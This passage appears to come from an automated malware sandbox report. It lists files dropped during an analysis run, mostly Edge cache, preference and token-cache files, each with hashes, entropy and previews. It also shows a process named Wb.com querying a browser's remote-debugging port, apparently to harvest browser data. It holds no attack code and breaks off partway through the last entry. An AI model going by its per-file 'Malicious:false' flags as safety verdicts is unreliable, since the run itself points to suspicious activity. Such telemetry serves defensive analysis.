                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):460992
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                      MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                      SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                      SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                      SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):9
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                      MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                      SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                      SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                      SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:uriCache_

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):179
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.001563127514606
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQoVEpVcy:YWLSGTt1o9LuLgfGBPAzkVj/T8lQoVEL
                                                                                                                                                                                                                                                                                                      MD5:0570CF96F3544A17109BF8B8C4AE0917
                                                                                                                                                                                                                                                                                                      SHA1:C6A083E411E71848A7F82E961683052ED594ECC3
                                                                                                                                                                                                                                                                                                      SHA-256:3CF08AFDD6BCBF3C764EBE75F610DE1AC6F221AF9676C8541B9AA22F25F5CA47
                                                                                                                                                                                                                                                                                                      SHA-512:212447BD8FD1535B5713ADD4F663772F3AC16EF18FDCD5C5C0247EF9121B35C40F0C8E024077FAE90EAF9C728013CB231F8DED723408C51B54821E997CE1C9E2
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735071301814109}]}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):86
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                                                      MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                                                      SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                                                      SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                                                      SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\afaaf36b-f063-4fed-a2ea-7fb228d55849.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44906
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.095173444193261
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWxxi1zNtZBcXOXNgTUpMEKKJDSgzMMd6qD47u3+CiB:+/Ps+wsI7ynjHIKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                      MD5:AD32AACEA077E67947B5830B4160C8CC
                                                                                                                                                                                                                                                                                                      SHA1:63B9074DCD270880F7F6E2D1316FA6BE79EBC276
                                                                                                                                                                                                                                                                                                      SHA-256:DAF1481B5613D836F7391FAF2D1615628E02605E3054320446D6518BB2793D6D
                                                                                                                                                                                                                                                                                                      SHA-512:A82D04B4ADF09C3A505AC74A42173BEC13522427E89017040227EC062ADBBD27210B0A1600E1C2A2A7FEF431593CB17B51CA99ACE958580601176ED2F27BD85C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\cea265a6-cf98-4585-9925-82d9eb89d32c.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44455
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.0898018136551775
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWBdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynn0kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                      MD5:D97F50FFCB5706CD18AA51F6BB81C6CA
                                                                                                                                                                                                                                                                                                      SHA1:38F68E971CF53E78DB46DA70E66F1F41F793FD4B
                                                                                                                                                                                                                                                                                                      SHA-256:0D3226017EF75ED36EED0FAF059760596E0C70A57A8456FAF63C80D497721B2D
                                                                                                                                                                                                                                                                                                      SHA-512:3647F063E1588DEBFE34B2EDDD0A74E96AFB02A4EA30D32E4B00A4113311A594348C1A836F70E8744981E5EC8D5EA721C8303B42C90C68FF81D960960416768B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2278
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.856095310462232
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:uiTrlKxrgxMGxl9Il8udiFHfttKVqGM6o+UBd1rc:msYeFHfvIMNi
                                                                                                                                                                                                                                                                                                      MD5:BEA5A3125558E969481E36BBBF140A66
                                                                                                                                                                                                                                                                                                      SHA1:A317F99356AEFED49367A9D2BE7574D60C3FE1B1
                                                                                                                                                                                                                                                                                                      SHA-256:809317A2EF1E658EFC0510153ACAC8D291EAA8F7E21F0CEB1494FB2D9BC1DA9F
                                                                                                                                                                                                                                                                                                      SHA-512:48B443E6ED331D674022A61294D314857EE44EDB521878298D22CB93943596D87E9D7D6BE09F5DBA39BD51CE391B5A90BE26A4B39B3DEE61E36474F968518F44
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.B.g.X.M.1.5.V.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.5.s.d.2.4.6.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):4622
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9999092150394837
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:uiTrlKxExPxD9Il8ud1raR3rWQgTPTlL5Mhfxug2fHpj+jWX714RSiULsLUyApMD:BYsR3BgbpL5+c3JX71GS5LsLUyCMnEI
                                                                                                                                                                                                                                                                                                      MD5:70D0E81E031A626713E554480166A1FC
                                                                                                                                                                                                                                                                                                      SHA1:66DDDA162F84DBA4C56E6F29B1E61912CE7DDE5E
                                                                                                                                                                                                                                                                                                      SHA-256:16368230C836EA8A6D1F4A6C2F5211F3B103C2B16A44CA2CB5578E8F743E20E6
                                                                                                                                                                                                                                                                                                      SHA-512:DECC640F5FF8652E4C559A61A14AA704D15D793300B21B251034331EF064EC2FE31FD1DF6BD5724A64C416F7F967130BE7D8C1BA6A0610C53CD6A252ADC7500C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".S.n.A.J.G.V.Z.V.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.5.s.d.2.4.6.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2684
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8875186524131244
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:uiTrlKx68Wa7xwyxl9Il8udtSaaSsTIxB4bEgOZRbzd/vc:aCWYJZnJebROfbu
                                                                                                                                                                                                                                                                                                      MD5:6651AB978522CCDEC9D74AD760FF703B
                                                                                                                                                                                                                                                                                                      SHA1:5C6DB3B80F081151782D1A79CE12823FCCD39CBD
                                                                                                                                                                                                                                                                                                      SHA-256:69C1F7A959598718829EA5FFD345F4AAD455CD278413256A3EAEA0FA1E4DED20
                                                                                                                                                                                                                                                                                                      SHA-512:674379517464076DA24675891EDA3A664C1C5E7FEB13B59600012ECC79FE4D9942C3088A3D6341CBC8072B6C4766741E02D77BB14CB49D418ECE9B49D9D0E67B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".J.d.i.s.S.C.d.0.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.5.s.d.2.4.6.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\json[1].json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):3500
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.397631592184683
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:6NnC+HCmNnCcbCgNnC1qD9CCNnCNdgECaNnCxWCSNnCDjlj6DCDjxNnC8wCrNnCN:6NtNhN8qJNuFNVNzgNNtN8
                                                                                                                                                                                                                                                                                                      MD5:3FD48C1B23F95A73B5F36F6ACF4F00A9
                                                                                                                                                                                                                                                                                                      SHA1:E0C48D87BE4DA52C093FFDE57D6227DCB4108EED
                                                                                                                                                                                                                                                                                                      SHA-256:7CC1B3130942CC6D18142A8A31A6D1ECAF981FC120BBE5BB08230578737C28F4
                                                                                                                                                                                                                                                                                                      SHA-512:45D4B4140F566B75321ECB13C20458FD4B2CEEDCCC6AB18655E7AF307AFB762F8653FBE0FA94AF2B138A5CC64D9A80640E04C3BF1281F1C7AAD83213CDA3CD4B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/B3B7CCCFD29464A6EA6BEA8AD2F88843",.. "id": "B3B7CCCFD29464A6EA6BEA8AD2F88843",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/B3B7CCCFD29464A6EA6BEA8AD2F88843"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/58AD78445682284BA1099FBB197FFE63",.. "id": "58AD78445682284BA1099FBB197FFE63",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/58AD78445682284BA1099FBB197FFE63"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\json[1].json

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1787
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.381254490667222
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:SfNaoCxq9q1TECxqLfNaoCFuCkfNaoCBC8fNaoCAh6hc0UrU0U8CAh1:6NnC401TEC4jNnCFuCQNnCBCoNnCAMix
                                                                                                                                                                                                                                                                                                      MD5:8EA54A4BA5F1D09AC8893C88BCE84507
                                                                                                                                                                                                                                                                                                      SHA1:37C330C7F252FD71DDAF03FE3CB6913A9822DE4F
                                                                                                                                                                                                                                                                                                      SHA-256:B17D2C0E3ECAEE6470D0227C312E55554F5CAD123785D52F9FE170226B3806E4
                                                                                                                                                                                                                                                                                                      SHA-512:C912C51C2E5BCC77C701F79932CB78FBD943316BD897FF1DC175D2145B9CF5CA1317DAF5DA67A99A35F8255EC1C05641A991A7823E0F788F2864B779862B807F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/45E055C79B6075965F24B73754AA2A61",.. "id": "45E055C79B6075965F24B73754AA2A61",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/45E055C79B6075965F24B73754AA2A61"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/25896A4DF1D7A09A1E6D31E65ECFBA8D",.. "id": "25896A4DF1D7A09A1E6D31E65ECFBA8D",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/25896A4DF1D7A09A1E6D31E65ECFBA8D"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\1a0ebe39-4840-4e5a-8cf2-4445b40c3a21.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\35911374-ef7e-45b8-bc58-a2da20191fc8.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41924
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):76314
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.996159328201069
